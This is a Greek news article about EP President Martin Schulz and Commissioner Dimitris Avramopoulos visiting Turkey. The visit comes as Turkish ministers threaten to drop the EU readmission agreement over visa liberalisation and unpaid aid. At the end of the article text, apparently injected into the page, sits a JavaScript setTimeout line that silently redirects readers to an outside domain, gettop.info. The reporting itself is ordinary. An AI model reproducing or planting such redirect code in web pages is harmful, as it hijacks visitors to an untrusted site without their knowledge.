Στην Τουρκία Σουλτς και Αβραμόπουλος εν μέσω απειλών για τη συμφωνία- ΕΕ λόγω βίζας

0
5

 

Εν μέσω απειλών από την πλευρά της Τουρκίας, έτσι όπως αυτή έχει διατυπωθεί από τον Τούρκο υπουργό Εξωτερικών, Μεβλούτ Τσαβούσογλου, ότι σε περίπτωση που τον προσεχή Οκτώβριο δεν καταργηθούν οι θεωρήσεις για τους Τούρκους πολίτες που θα ταξιδεύουν προς τις χώρες μέλη της ΕΕ, η Τουρκία θα καταγγείλει τη συμφωνία επανεισδοχής που έχουν υπογράψει η Τουρκία και η ΕΕ, πραγματοποιείται την Πέμπτη, η επίσκεψη του Προέδρου του Ευρωπαϊκού Κοινοβουλίου, Μάρτιν Σουλτς και του Ευρωπαίου Επίτροπου, αρμόδιου για θέματα μετανάστευσης, Δημήτρη Αβραμόπουλου, στην Τουρκία.

Ο πρόεδρος του Ευρωπαϊκού Κοινοβουλίου αναμένεται να συναντηθεί με τον πρόεδρο της Τουρκίας, Ταγίπ Ερντογάν και άλλους Τούρκους αξιωματούχους.
Στο επίκεντρο των συζητήσεων θα τεθούν η συμφωνία επανεισδοχής και η κατάργηση των θεωρήσεων.

Η τουρκική πλευρά από την πλευρά της υπογραμμίζει όχι μόνο το θέμα των θεωρήσεων, αλλά και το οικονομικό ζήτημα, με τον αρμόδιο για θέματα Ευρωπαϊκής Ένωσης, υπουργό της Τουρκίας Ομέρ Τσελίκ, να δηλώνει πριν από μερικές μέρες σε ελβετικό τηλεοπτικό κανάλι, πως «η ΕΕ δεν τήρησε τις υποσχέσεις της ούτε στο θέμα της υποδοχής προσφύγων ούτε σε αυτό της οικονομικής βοήθειας. Επομένως δεν θα θέσουμε σε εφαρμογή της συμφωνία επανεισδοχής».

Η πρόοδος που έχει σημειωθεί μετά το κοινό ανακοινωθέν ΕΕ-Τουρκίας, στις 18 Μαρτίου 2016, θα εξεταστεί από τον αρμόδιο Επίτροπο Δημήτρη Αβραμόπουλο κατά τις επαφές του με τους τούρκους αξιωματούχους, την Πέμπτη στην Άγκυρα. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here